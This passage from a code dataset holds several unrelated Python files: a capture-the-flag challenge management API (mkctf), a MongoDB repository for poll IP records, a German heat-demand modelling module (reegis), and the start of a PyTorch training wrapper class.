default=DEFAULT_TIMEOUT,\n help=\"override default timeout for subprocesses.\")\n build_p.set_defaults(func=build)\n # ---- deploy\n deploy_p = sps.add_parser('deploy', help=\"deploy challenges.\")\n deploy_p.add_argument('-c', '--category', help=\"challenge's category.\")\n deploy_p.add_argument('-s', '--slug', help=\"challenge's slug.\")\n deploy_p.add_argument('-t', '--timeout', type=int, default=DEFAULT_TIMEOUT,\n help=\"override default timeout for subprocesses.\")\n deploy_p.set_defaults(func=deploy)\n # ---- status\n status_p = sps.add_parser('status', help=\"check deployed challenge's \"\n \"status using exploit/exploit.\")\n status_p.add_argument('-c', '--category', help=\"challenge's category.\")\n status_p.add_argument('-s', '--slug', help=\"challenge's slug.\")\n status_p.add_argument('-t', '--timeout', type=int, default=DEFAULT_TIMEOUT,\n help=\"override default timeout for subprocesses.\")\n status_p.set_defaults(func=status)\n\n args = p.parse_args()\n\n args.configuration = None\n\n return args\n\n def __init__(self, repo_root,\n debug, quiet, no_color,\n out=None):\n \"\"\"Constructs a new instance\n\n Arguments:\n repo_root {Path} -- [description]\n debug {bool} -- [description]\n quiet {bool} -- [description]\n no_color {bool} -- [description]\n\n Keyword Arguments:\n out {IOBase} -- [description] (default: {None})\n \"\"\"\n\n super(MKCTFAPI, self).__init__()\n self.logger = Logger(debug, quiet, no_color, out)\n\n self.repo_root = Path(repo_root)\n self.logger.debug('repo_root: {}'.format(self.repo_root))\n\n self.glob_conf_path = Path.home() / '.config/mkctf.yml'\n self.logger.debug('glob_conf_path: {}'.format(self.glob_conf_path))\n\n self.glob_conf = load_config(self.glob_conf_path)\n self.logger.debug('glob_conf: {}'.format(self.glob_conf))\n\n self.repo_conf_path = self.repo_root / self.glob_conf['files']['config']['repository']\n self.logger.debug('repo_conf_path: {}'.format(self.repo_conf_path))\n\n self.repo = Repository(self.logger, self.repo_conf_path, self.glob_conf)\n\n async def perform(self, ns):\n \"\"\"Performs a comand using given Namespace ns\n\n Arguments:\n ns {[type]} -- [description]\n\n Returns:\n [type] -- [description]\n \"\"\"\n self.logger.info(\"mkctf starts...\")\n self.logger.debug(\"ns: {}\".format(ns))\n\n if ns.command != 'init' and self.repo.get_conf() is None:\n self.logger.fatal(\"mkctf repository must be initialized first. \"\n \"Run `mkctf init` first.\")\n\n try:\n # -----------------------------------------------------------------\n # 'result' content depending on json argument value:\n # if ns.json:\n # result = dict or None\n # else:\n # result = True or False\n # -----------------------------------------------------------------\n result = await ns.func(ns, self.repo, self.logger)\n except Exception as e:\n print_exc()\n self.logger.fatal(\"Ouuuuupss.....:(\")\n\n if result:\n self.logger.info(\"mkctf ended successfully.\" )\n else:\n self.logger.error(\"mkctf ended with errors.\")\n\n return result\n\n def __ns(self, func):\n \"\"\"Creates a standard Namespace used by all functions of the API\n\n Arguments:\n func {function} -- [description]\n\n Returns:\n Namespace -- [description]\n \"\"\"\n ns = Namespace()\n ns.json = True\n ns.force = True\n ns.no_color = True\n ns.command = func.__name__\n ns.func = func\n return ns\n\n def init(self):\n \"\"\"API wrapper for 'init' command\n\n Returns:\n [type] -- [description]\n \"\"\"\n ns = self.__ns(init)\n # perform\n return self.perform(ns)\n\n def show(self):\n \"\"\"API wrapper for 'show' command\n\n Returns:\n [type] -- [description]\n \"\"\"\n ns = self.__ns(show)\n # perform\n return self.perform(ns)\n\n def create(self,\n category,\n name,\n flag,\n points,\n parameters={},\n enabled=False,\n standalone=True):\n \"\"\"API wrapper for 'create' command\n\n Arguments:\n category {str} -- [description]\n name {str} -- [description]\n flag {str} -- [description]\n points {int} -- [description]\n parameters {dict} -- [description]\n enabled {bool} -- [description]\n standalone {bool} -- [description]\n\n Returns:\n [type] -- [description]\n \"\"\"\n ns = self.__ns(create)\n # parameters\n ns.configuration = {\n 'name': name,\n 'slug': slugify(name),\n 'flag': flag,\n 'points': points,\n 'enabled': enabled,\n 'category': category,\n 'parameters': parameters,\n 'standalone': standalone\n }\n # perform\n return self.perform(ns)\n\n def delete(self, category=None, slug=None):\n \"\"\"API wrapper for 'delete' command\n\n Keyword Arguments:\n category {str} -- [description] (default: {None})\n slug {str} -- [description] (default: {None})\n\n Returns:\n [type] -- [description]\n \"\"\"\n ns = self.__ns(delete)\n # parameters\n ns.category = category\n ns.slug = slug\n # perform\n return self.perform(ns)\n\n def configure(self, configuration, category=None, slug=None):\n \"\"\"API wrapper for 'configure' command\n\n Arguments:\n configuration {dict} -- [description]\n\n Keyword Arguments:\n category {str} -- [description] (default: {None})\n slug {str} -- [description] (default: {None})\n\n Returns:\n [type] -- [description]\n \"\"\"\n ns = self.__ns(enable)\n # parameters\n ns.configuration = configuration\n ns.category = category\n ns.slug = slug\n # perform\n return self.perform(ns)\n\n def enable(self, category, slug):\n \"\"\"API wrapper for 'enable' command\n\n Arguments:\n category {str} -- [description]\n slug {str} -- [description]\n\n Returns:\n [type] -- [description]\n \"\"\"\n ns = self.__ns(enable)\n # parameters\n ns.category = category\n ns.slug = slug\n # perform\n return self.perform(ns)\n\n def disable(self, category, slug):\n \"\"\"API wrapper for 'disable' command\n\n Arguments:\n category {str} -- [description]\n slug {str} -- [description]\n\n Returns:\n [type] -- [description]\n \"\"\"\n ns = self.__ns(disable)\n # parameters\n ns.category = category\n ns.slug = slug\n # perform\n return self.perform(ns)\n\n def export(self, export_dir,\n category=None, slug=None,\n include_disabled=False):\n \"\"\"API wrapper for 'export' command\n\n Arguments:\n export_dir {Path} -- [description]\n\n Keyword Arguments:\n category {str} -- [description] (default: {None})\n slug {str} -- [description] (default: {None})\n include_disabled {bool} -- [description] (default: {False})\n\n Returns:\n [type] -- [description]\n \"\"\"\n ns = self.__ns(export)\n # parameters\n ns.export_dir = export_dir\n ns.category = category\n ns.slug = slug\n ns.include_disabled = include_disabled\n # perform\n return self.perform(ns)\n\n def renew_flag(self, category=None, slug=None, size=DEFAULT_SIZE):\n \"\"\"API wrapper for 'renew_flag' command\n\n Keyword Arguments:\n category {str} -- [description] (default: {None})\n slug {str} -- [description] (default: {None})\n size {int} -- [description] (default: {DEFAULT_SIZE})\n\n Returns:\n [type] -- [description]\n \"\"\"\n ns = self.__ns(renew_flag)\n # parameters\n ns.category = category\n ns.slug = slug\n ns.size = size\n # perform\n return self.perform(ns)\n\n def build(self, category=None, slug=None, timeout=DEFAULT_TIMEOUT):\n \"\"\"API wrapper for 'build' command\n\n Keyword Arguments:\n category {str} -- [description] (default: {None})\n slug {str} -- [description] (default: {None})\n timeout {int} -- [description] (default: {DEFAULT_TIMEOUT})\n\n Returns:\n [type] -- [description]\n \"\"\"\n ns = self.__ns(build)\n # parameters\n ns.category = category\n ns.slug = slug\n ns.timeout = timeout\n # perform\n return self.perform(ns)\n\n def deploy(self, category=None, slug=None, timeout=DEFAULT_TIMEOUT):\n \"\"\"API wrapper for 'deploy' command\n\n Keyword Arguments:\n category {str} -- [description] (default: {None})\n slug {str} -- [description] (default: {None})\n timeout {int} -- [description] (default: {DEFAULT_TIMEOUT})\n\n Returns:\n [type] -- [description]\n \"\"\"\n ns = self.__ns(deploy)\n # parameters\n ns.category = category\n ns.slug = slug\n ns.timeout = timeout\n # perform\n return self.perform(ns)\n\n def status(self, category=None, slug=None, timeout=DEFAULT_TIMEOUT):\n \"\"\"API wrapper for 'status' command\n\n Keyword Arguments:\n category {str} -- [description] (default: {None})\n slug {str} -- [description] (default: {None})\n timeout {int} -- [description] (default: {DEFAULT_TIMEOUT})\n\n Returns:\n [type] -- [description]\n \"\"\"\n ns = self.__ns(status)\n # parameters\n ns.category = category\n ns.slug = slug\n ns.timeout = timeout\n # perform\n return self.perform(ns)\n", "sub_path": "mkctf/api.py", "file_name": "api.py", "file_ext": "py", "file_size_in_byte": 16802, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 49, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 57, "usage_type": "name"}, {"api_name": "pathlib.Path.cwd", "line_number": 57, "usage_type": "call"}, {"api_name": "mkctf.command.init.init", "line_number": 68, "usage_type": "name"}, {"api_name": "mkctf.command.show.show", "line_number": 73, "usage_type": "name"}, {"api_name": "mkctf.command.create.create", "line_number": 76, "usage_type": "name"}, {"api_name": "mkctf.command.delete.delete", "line_number": 81, "usage_type": "name"}, {"api_name": "mkctf.command.configure.configure", "line_number": 87, "usage_type": "name"}, {"api_name": "mkctf.command.enable.enable", "line_number": 92, "usage_type": "name"}, {"api_name": "mkctf.command.disable.disable", "line_number": 97, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 101, "usage_type": "name"}, {"api_name": "mkctf.command.export.export", "line_number": 109, "usage_type": "name"}, {"api_name": "mkctf.command.renew_flag.renew_flag", "line_number": 118, "usage_type": "name"}, {"api_name": "mkctf.command.build.build", "line_number": 127, "usage_type": "name"}, {"api_name": "mkctf.command.deploy.deploy", "line_number": 134, "usage_type": "name"}, {"api_name": "mkctf.command.status.status", "line_number": 142, "usage_type": "name"}, {"api_name": "mkctf.helper.logger.Logger", "line_number": 166, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 168, "usage_type": "call"}, {"api_name": "pathlib.Path.home", "line_number": 171, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 171, "usage_type": "name"}, {"api_name": "mkctf.helper.config.load_config", "line_number": 174, "usage_type": "call"}, {"api_name": "mkctf.object.repository.Repository", "line_number": 180, "usage_type": "call"}, {"api_name": "traceback.print_exc", "line_number": 208, "usage_type": "call"}, {"api_name": "argparse.Namespace", "line_number": 227, "usage_type": "call"}, {"api_name": "mkctf.command.init.init", "line_number": 241, "usage_type": "argument"}, {"api_name": "mkctf.command.show.show", "line_number": 251, "usage_type": "argument"}, {"api_name": "mkctf.command.create.create", "line_number": 277, "usage_type": "argument"}, {"api_name": "slugify.slugify", "line_number": 281, "usage_type": "call"}, {"api_name": "mkctf.command.delete.delete", "line_number": 302, "usage_type": "argument"}, {"api_name": "mkctf.command.enable.enable", "line_number": 322, "usage_type": "argument"}, {"api_name": "mkctf.command.enable.enable", "line_number": 340, "usage_type": "argument"}, {"api_name": "mkctf.command.disable.disable", "line_number": 357, "usage_type": "argument"}, {"api_name": "mkctf.command.export.export", "line_number": 380, "usage_type": "argument"}, {"api_name": "mkctf.command.renew_flag.renew_flag", "line_number": 400, "usage_type": "argument"}, {"api_name": "mkctf.command.build.build", "line_number": 419, "usage_type": "argument"}, {"api_name": "mkctf.command.deploy.deploy", "line_number": 438, "usage_type": "argument"}, {"api_name": "mkctf.command.status.status", "line_number": 457, "usage_type": "argument"}]}
+{"seq_id": "309707249", "text": "# -*- coding: utf-8 -*-\nimport pymongo\nfrom bson.objectid import ObjectId\nfrom db import DB\nimport datetime\n\nclass PollIpRepository(DB):\n\n def __init__(self,pollId):\n DB.__init__(self)\n self.table = self.database['ip_%s'%pollId]\n\n def CreateIndex(self):\n self.table.ensure_index('ip',unique=False)\n\n def GetIpCount(self,dataId=None,ip=None,ipLimitTime=None):\n '''返回指定时间内的ip数'''\n condition ={}\n if dataId:\n condition['data_id'] = dataId\n if ip:\n condition['ip'] = ip\n if ipLimitTime:\n startTime = datetime.datetime.now() - datetime.timedelta(seconds=ipLimitTime)\n condition['isrtdate'] = {'$gte':startTime}\n cur = self.table.find(condition)\n return cur.count()\n\n def Search(self,data_id=None,ip=None,sort='isrtdate',desc=True,start=0,count=10):\n condition = {}\n\n #\n\n #如果用户按照uid或者id搜索。则将条件设置为唯一搜索\n if data_id:\n condition['data_id'] = data_id\n\n if ip:\n condition['ip'] = ip\n\n\n cur = self.table.find(condition)\n #满足条件的总记录数\n totalCount = cur.count()\n #设定排序\n sortType = pymongo.ASCENDING\n if desc:\n sortType = pymongo.DESCENDING\n cur = cur.skip(start).limit(count).sort(sort, sortType)\n recordList =list()\n for item in cur:\n recordList.append(item)\n return {'list':recordList,'total_count':totalCount}\n\n def Save(self,data):\n self.table.save(data)\n return True\n\n def Remove(self,id):\n self.table.remove({'id':id})\n return True\n\n def RemoveAll(self):\n self.table.remove()\n return True\n\nif __name__=='__main__':\n pass", "sub_path": "app/repository/pollip.py", "file_name": "pollip.py", "file_ext": "py", "file_size_in_byte": 1826, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "db.DB", "line_number": 7, "usage_type": "name"}, {"api_name": "db.DB.__init__", "line_number": 10, "usage_type": "call"}, {"api_name": "db.DB", "line_number": 10, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 24, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 24, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 24, "usage_type": "call"}, {"api_name": "pymongo.ASCENDING", "line_number": 46, "usage_type": "attribute"}, {"api_name": "pymongo.DESCENDING", "line_number": 48, "usage_type": "attribute"}]}
+{"seq_id": "600577837", "text": "# -*- coding: utf-8 -*-\n\n\"\"\"Processing a list of power plants in Germany.\n\nSPDX-FileCopyrightText: 2016-2021 Uwe Krien \n\nSPDX-License-Identifier: MIT\n\"\"\"\n__copyright__ = \"Uwe Krien \"\n__license__ = \"MIT\"\n\n\n# Python libraries\nimport os\nimport logging\n\n# External libraries\nimport pandas as pd\nfrom workalendar.europe import Germany\n\n# oemof libraries\nimport demandlib.bdew as bdew\n\n# internal modules\nfrom reegis import config as cfg\nfrom reegis import bmwi\nfrom reegis import geometries\nfrom reegis import energy_balance\nfrom reegis import coastdat\nfrom reegis import inhabitants\n\n\ndef heat_demand(year):\n \"\"\"\n Fetch heat demand per sector from the federal states energy balances.\n\n If the share between domestic and retail does not exist the share from\n the german balance is used. If this value also not exists a default\n share of 0.5 is used.\n\n Parameters\n ----------\n year\n\n Returns\n -------\n pandas.DataFrame\n\n Examples\n --------\n >>> hd=heat_demand(2014)\n >>> hd.loc[('MV', 'domestic'), 'district heating']\n 5151.5\n \"\"\"\n eb = energy_balance.get_usage_balance(year)\n eb.sort_index(inplace=True)\n\n # get fraction of domestic and retail from the german energy balance\n share = energy_balance.get_domestic_retail_share(year)\n\n # Use 0.5 for both sectors if no value is given\n share.fillna(0.5, inplace=True)\n\n # Divide domestic and retail by the value of the german energy balance if\n # the sum of domestic and retail does not equal the value given in the\n # local energy balance.\n check_value = True\n for state in eb.index.get_level_values(0).unique():\n for col in eb.columns:\n check = (\n eb.loc[(state, \"domestic\"), col]\n + eb.loc[(state, \"retail\"), col]\n - eb.loc[(state, \"domestic and retail\"), col]\n ).round()\n if check < 0:\n for sector in [\"domestic\", \"retail\"]:\n try:\n eb.loc[(state, sector), col] = (\n eb.loc[(state, \"domestic and retail\"), col]\n * share.loc[col, sector]\n )\n except KeyError:\n eb.loc[(state, sector), col] = (\n eb.loc[(state, \"domestic and retail\"), col] * 0.5\n )\n\n check = (\n eb.loc[(state, \"domestic\"), col]\n + eb.loc[(state, \"retail\"), col]\n - eb.loc[(state, \"domestic and retail\"), col]\n ).round()\n\n if check < 0:\n logging.error(\n \"In {0} the {1} sector results {2}\".format(\n state, col, check\n )\n )\n check_value = False\n if check_value:\n logging.debug(\"Divides 'domestic and retail' without errors.\")\n\n # Reduce energy balance to the needed columns and group by fuel groups.\n eb = eb.loc[\n (slice(None), [\"industrial\", \"domestic\", \"retail\"]),\n ]\n\n eb = eb.groupby(by=cfg.get_dict(\"FUEL_GROUPS_HEAT_DEMAND\"), axis=1).sum()\n\n # Remove empty columns\n for col in eb.columns:\n if not (\n eb.loc[(slice(None), \"domestic\"), col].sum() > 0\n or eb.loc[(slice(None), \"retail\"), col].sum() > 0\n or eb.loc[(slice(None), \"industrial\"), col].sum() > 0\n ):\n del eb[col]\n\n # The use of electricity belongs to the electricity sector. It is possible\n # to connect it to the heating sector for future scenarios.\n del eb[\"electricity\"]\n del eb[\"total\"] # if electricity is removed total is not correct anymore.\n\n # get fraction of mechanical energy use and subtract it from the balance to\n # get the use of heat only.\n share_mech = share_of_mechanical_energy_bmwi(year)\n for c in share_mech.columns:\n for i in share_mech.index:\n eb.loc[(slice(None), c), i] -= (\n eb.loc[(slice(None), c), i] * share_mech.loc[i, c]\n )\n eb.sort_index(inplace=True)\n\n return eb\n\n\ndef share_of_mechanical_energy_bmwi(year):\n \"\"\"\n Get share of mechanical energy from the overall energy use per sector.\n\n Parameters\n ----------\n year : int\n\n Returns\n -------\n pandas.DataFrame\n\n Examples\n --------\n >>> share_of_mechanical_energy_bmwi(2014).loc['oil', 'retail']\n 0.078\n\n \"\"\"\n mech = pd.DataFrame()\n fs = bmwi.read_bmwi_sheet_7(\"a\")\n fs.sort_index(inplace=True)\n sector = \"Industrie\"\n\n total = float(fs.loc[(sector, \"gesamt\"), year])\n mech[sector] = (\n fs.loc[(sector, \"mechanische Energie\"), year].div(total).round(3)\n )\n\n fs = bmwi.read_bmwi_sheet_7(\"b\")\n fs.sort_index(inplace=True)\n for sector in fs.index.get_level_values(0).unique():\n total = float(fs.loc[(sector, \"gesamt\"), year])\n mech[sector] = (\n fs.loc[(sector, \"mechanische Energie\"), year]\n .div(total)\n .astype(float)\n .round(3)\n )\n mech.drop(\" - davon Strom\", inplace=True)\n mech.drop(\"mechanische Energie\", inplace=True)\n ren_col = {\n \"Industrie\": \"industrial\",\n \"Gewerbe, Handel, Dienstleistungen \": \"retail\",\n \"private Haushalte\": \"domestic\",\n }\n ren_index = {\n \" - davon Öl\": \"oil\",\n \" - davon Gas\": \"natural gas\",\n }\n mech.index.name = \"\"\n mech.rename(columns=ren_col, inplace=True)\n mech.rename(index=ren_index, inplace=True)\n mech.fillna(0, inplace=True)\n return mech\n\n\ndef get_heat_profile_from_demandlib(\n temperature, annual_demand, sector, year, build_class=1\n):\n \"\"\"\n Create an hourly load profile from the annual demand using the demandlib.\n\n Parameters\n ----------\n temperature : pandas.Series\n annual_demand : float\n sector : str\n year : int\n build_class : int\n\n Returns\n -------\n pandas.DataFrame\n\n Examples\n --------\n >>> temperature=pd.Series(list(range(50)), index=pd.date_range(\n ... '2014-05-03 12:00', periods=50, freq='h'))\n >>> temperature = 10 + temperature * 0.1\n >>> hp=get_heat_profile_from_demandlib(\n ... temperature, 5345, 'retail', 2014)\n >>> int(round(hp.sum()))\n 5302\n \"\"\"\n cal = Germany()\n holidays = dict(cal.holidays(year))\n\n if \"efh\" in sector:\n shlp_type = \"EFH\"\n elif \"mfh\" in sector:\n shlp_type = \"MFH\"\n elif \"domestic\" in sector:\n shlp_type = \"MFH\"\n elif \"retail\" in sector:\n shlp_type = \"ghd\"\n build_class = 0\n elif \"industrial\" in sector:\n shlp_type = \"ghd\"\n build_class = 0\n else:\n raise AttributeError('\"{0}\" is an unknown sector.'.format(sector))\n return bdew.HeatBuilding(\n temperature.index,\n holidays=holidays,\n temperature=temperature,\n shlp_type=shlp_type,\n wind_class=0,\n building_class=build_class,\n annual_heat_demand=annual_demand,\n name=sector,\n ww_incl=True,\n ).get_bdew_profile()\n\n\ndef get_heat_profiles_by_federal_state(\n year, to_csv=None, state=None, weather_year=None\n):\n \"\"\"\n Get heat profiles by state, sector and fuel. Use the pandas `groupby`\n method to group the results.\n\n The unit of the resulting data is TJ.\n\n Parameters\n ----------\n year : int\n Year of the demand data set.\n to_csv : str\n Path to the csv file.\n state : list or None\n List of abbreviations of federal states. If None a table with all\n federal states will be returned. Valid values are: BB, BE, BW, BY, HB,\n HE, HH, MV, NI, NW, RP, SH, SL, SN, ST, TH\n weather_year : int or None\n Can be used if the year of the weather data differs from the year of\n the demand data. If None the year parameter will be used. Use with\n care, because the demand data may include implicit weather effects.\n\n Returns\n -------\n pd.DataFrame\n\n Examples\n --------\n >>> fn=os.path.join(os.path.expanduser('~'),\n ... 'heat_profile.reegis_doctest.csv')\n >>> hp=get_heat_profiles_by_federal_state(2014, state=['BE', 'BB'],\n ... to_csv=fn)\n >>> hp.groupby(level=[0, 1], axis=1).sum().sum().round(1)\n BB domestic 66822.4\n industrial 69668.0\n retail 23299.5\n BE domestic 67382.1\n industrial 6162.8\n retail 39364.9\n dtype: float64\n >>> round(hp.groupby(level=[0, 2], axis=1).sum().sum().loc['BB'], 1)\n district heating 17646.9\n gas 3916.3\n hard coal 21378.4\n lignite 5630.5\n natural gas 63840.8\n oil 16257.4\n other 1112.1\n re 30007.4\n dtype: float64\n >>> hp_MWh=hp.div(0.0036)\n >>> round(hp_MWh.groupby(level=[2], axis=1).sum().sum().loc['lignite'], 1)\n 1671427.4\n >>> round(hp.sum().sum(), 1)\n 272699.7\n \"\"\"\n\n if weather_year is None:\n weather_year = year\n\n building_class = {}\n for (k, v) in cfg.get_dict(\"building_class\").items():\n for s in v.split(\", \"):\n building_class[s] = int(k)\n\n demand_state = heat_demand(year).sort_index()\n\n temperatures = coastdat.federal_state_average_weather(\n weather_year, \"temp_air\"\n )\n\n temperatures = temperatures.tz_convert(\"Europe/Berlin\")\n\n my_columns = pd.MultiIndex(levels=[[], [], []], codes=[[], [], []])\n heat_profiles = pd.DataFrame(columns=my_columns)\n\n if state is None:\n states = demand_state.index.get_level_values(0).unique()\n else:\n states = state\n\n # for region in demand_state.index.get_level_values(0).unique():\n for region in states:\n logging.info(\"Creating heat profile for {}\".format(region))\n tmp = demand_state.loc[region].groupby(level=0).sum()\n temperature = temperatures[region] - 273\n for fuel in tmp.columns:\n logging.debug(\n \"{0} - {1} ({2})\".format(region, fuel, building_class[region])\n )\n for sector in tmp.index:\n heat_profiles[\n (region, sector, fuel)\n ] = get_heat_profile_from_demandlib(\n temperature,\n tmp.loc[sector, fuel],\n sector,\n year,\n building_class[region],\n )\n heat_profiles.sort_index(1, inplace=True)\n\n if to_csv is not None:\n heat_profiles.to_csv(to_csv)\n return heat_profiles\n\n\ndef get_heat_profiles_by_region(\n regions, year, name=\"region\", from_csv=None, to_csv=None, weather_year=None\n):\n \"\"\"\n Get heat profiles for any region divided by sector and fuel. Use the\n pandas `groupby` method to group the results.\n\n The unit of the resulting data is TJ.\n\n Parameters\n ----------\n year : int\n Year of the demand data set.\n regions : geopandas.geoDataFrame\n A table with region geometries and there id as index.\n name : str\n Name of the regions set.\n from_csv : str\n Path to the file of the demand state profiles.\n to_csv : str\n Path with filename of the output file.\n weather_year : int or None\n Can be used if the year of the weather data differs from the year of\n the demand data. If None the year parameter will be used. Use with\n care, because the demand data may include implicit weather effects.\n\n Returns\n -------\n pd.DataFrame\n\n Examples\n --------\n >>> from reegis import geometries\n >>> fn=os.path.join(os.path.expanduser('~'),\n ... 'heat_profile.reegis_doctest.csv')\n >>> regions=geometries.load(\n ... cfg.get('paths', 'geometry'),\n ... cfg.get('geometry', 'de21_polygons'))\n >>> hpl=get_heat_profiles_by_region(regions, 2014, from_csv=fn)\n >>> round(hpl.sum().sum(), 1)\n 272699.7\n >>> os.remove(fn)\n\n \"\"\"\n if weather_year is None:\n weather_year = year\n\n # Get demand by federal state\n if from_csv is None:\n from_csv = os.path.join(\n cfg.get(\"paths\", \"demand\"),\n cfg.get(\"demand\", \"heat_profile_state_var\").format(\n year=year, weather_year=weather_year\n ),\n )\n if not os.path.isfile(from_csv):\n get_heat_profiles_by_federal_state(\n year, to_csv=from_csv, weather_year=weather_year\n )\n demand_state = pd.read_csv(from_csv, index_col=[0], header=[0, 1, 2])\n\n # Create empty MulitIndex DataFrame to take the results\n four_level_columns = pd.MultiIndex(\n levels=[[], [], [], []], codes=[[], [], [], []]\n )\n demand_region = pd.DataFrame(\n index=demand_state.index, columns=four_level_columns\n )\n\n # Get inhabitants for federal states and the given regions\n ew = inhabitants.get_share_of_federal_states_by_region(year, regions, name)\n\n # Use the inhabitants to recalculate the demand from federal states to\n # the given regions.\n for i in ew.items():\n state = i[0][1]\n region = i[0][0]\n share = i[1]\n if state in demand_state.columns.get_level_values(0).unique():\n for sector in (\n demand_state[state].columns.get_level_values(0).unique()\n ):\n for fuel in demand_state[state, sector].columns:\n demand_region[region, fuel, sector, state] = (\n demand_state[state, sector, fuel] * share\n )\n demand_region.sort_index(1, inplace=True)\n demand_region = demand_region.groupby(level=[0, 1, 2], axis=1).sum()\n\n if to_csv is not None:\n demand_region.to_csv(to_csv)\n\n return demand_region\n\n\nif __name__ == \"__main__\":\n pass\n", "sub_path": "reegis/demand_heat.py", "file_name": "demand_heat.py", "file_ext": "py", "file_size_in_byte": 13934, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "reegis.energy_balance.get_usage_balance", "line_number": 55, "usage_type": "call"}, {"api_name": "reegis.energy_balance", "line_number": 55, "usage_type": "name"}, {"api_name": "reegis.energy_balance.get_domestic_retail_share", "line_number": 59, "usage_type": "call"}, {"api_name": "reegis.energy_balance", "line_number": 59, "usage_type": "name"}, {"api_name": "logging.error", "line_number": 94, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 101, "usage_type": "call"}, {"api_name": "reegis.config.get_dict", "line_number": 108, "usage_type": "call"}, {"api_name": "reegis.config", "line_number": 108, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 155, "usage_type": "call"}, {"api_name": "reegis.bmwi.read_bmwi_sheet_7", "line_number": 156, "usage_type": "call"}, {"api_name": "reegis.bmwi", "line_number": 156, "usage_type": "name"}, {"api_name": "reegis.bmwi.read_bmwi_sheet_7", "line_number": 165, "usage_type": "call"}, {"api_name": "reegis.bmwi", "line_number": 165, "usage_type": "name"}, {"api_name": "workalendar.europe.Germany", "line_number": 221, "usage_type": "call"}, {"api_name": "demandlib.bdew.HeatBuilding", "line_number": 238, "usage_type": "call"}, {"api_name": "demandlib.bdew", "line_number": 238, "usage_type": "name"}, {"api_name": "reegis.config.get_dict", "line_number": 314, "usage_type": "call"}, {"api_name": "reegis.config", "line_number": 314, "usage_type": "name"}, {"api_name": "reegis.coastdat.federal_state_average_weather", "line_number": 320, "usage_type": "call"}, {"api_name": "reegis.coastdat", "line_number": 320, "usage_type": "name"}, {"api_name": "pandas.MultiIndex", "line_number": 326, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 327, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 336, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 340, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 409, "usage_type": "call"}, {"api_name": "os.path", "line_number": 409, "usage_type": "attribute"}, {"api_name": "reegis.config.get", "line_number": 410, "usage_type": "call"}, {"api_name": "reegis.config", "line_number": 410, "usage_type": "name"}, {"api_name": "reegis.config.get", "line_number": 411, "usage_type": "call"}, {"api_name": "reegis.config", "line_number": 411, "usage_type": "name"}, {"api_name": "os.path.isfile", "line_number": 415, "usage_type": "call"}, {"api_name": "os.path", "line_number": 415, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 419, "usage_type": "call"}, {"api_name": "pandas.MultiIndex", "line_number": 422, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 425, "usage_type": "call"}, {"api_name": "reegis.inhabitants.get_share_of_federal_states_by_region", "line_number": 430, "usage_type": "call"}, {"api_name": "reegis.inhabitants", "line_number": 430, "usage_type": "name"}]}
+{"seq_id": "246853409", "text": "\"\"\"Class for training / evaluating pytorch networks\n\nReference Implementations:\n- https://github.com/keras-team/keras/blob/master/keras/engine/training.py\n\"\"\"\n\nfrom tensorflow.python.keras.callbacks import (\n BaseLogger, CallbackList, History, ProgbarLogger\n)\nimport torch\n\n\nclass Model(object):\n \"\"\"Model for training / evaluating pytorch networks\n\n Reference Implementation:\n - https://github.com/keras-team/keras/blob/master/keras/engine/training.py\n \"\"\"\n\n def __init__(self, network, device=None):\n \"\"\"Init\n\n :param network: pytorch network to train or evaluate\n :type network: torch.nn.Module\n :param device: device to train the network on, e.g. 'cuda:0'\n :type device: str\n \"\"\"\n\n self.network = network\n self.device = device\n\n self._compiled = False\n # these are set in the `compile` method\n self.optimizer = None\n self.loss = None\n\n self.history = History()\n self.stop_training = False\n\n def _assert_compiled(self):\n \"\"\"Raise a value error if the model is not compiled\n\n This is a convenience wrapper to avoid duplicating these lines in\n multiple methods.\n\n :raises: RuntimeError if `self._compiled` is not True\n \"\"\"\n\n if not self._compiled:\n msg = ('Model must be compiled before training; please call '\n 'the `compile` method before training.')\n raise RuntimeError(msg)\n\n def _default_callbacks(self):\n \"\"\"Return default callbacks automatically applied during training\n\n By default, the following callbacks are automatically applied during\n training:\n - tensorflow.keras.callbacks.BaseLogger\n - tensorflow.keras.callbacks.ProgbarLogger\n - tensorflow.keras.callbacks.History (which is the `Model.history`\n attribute set in `Model.__init__`)\n\n :return: callbacks automatically applied to every Model\n :rtype: list\n \"\"\"\n\n default_callbacks = [\n BaseLogger(), ProgbarLogger(count_mode='steps'), self.history\n ]\n return default_callbacks\n\n def compile(self, optimizer, loss):\n \"\"\"Setup the model for training\n\n This sets `self.optimizer` and `self.loss` in place.\n\n :param optimizer: class name of the optimizer to use when training, one\n of those from `torch.optim` (e.g. `Adam`)\n :type optimizer: str\n :param loss: class name of the loss to use when training, one of those\n from `torch.nn` (e.g. `CrossEntropyLoss`)\n :type loss: str\n :raises AttributeError: if an invalid optimizer or loss function is\n specified\n \"\"\"\n\n try:\n Optimizer = getattr(torch.optim, optimizer)\n except AttributeError:\n msg = (\n '`optimizer` must be a `str` representing an optimizer from '\n 'the `torch.optim` package, and {} is not a valid one.'\n )\n raise AttributeError(msg.format(optimizer))\n self.optimizer = Optimizer(self.network.parameters())\n\n try:\n Loss = getattr(torch.nn, loss)\n except AttributeError:\n msg = (\n '`loss` must be a `str` representing a loss from '\n 'the `torch.nn` package, and {} is not a valid one.'\n )\n raise AttributeError(msg.format(loss))\n self.loss = Loss()\n\n self._compiled = True\n\n def evaluate_generator(self, generator, n_steps):\n \"\"\"Evaluate the 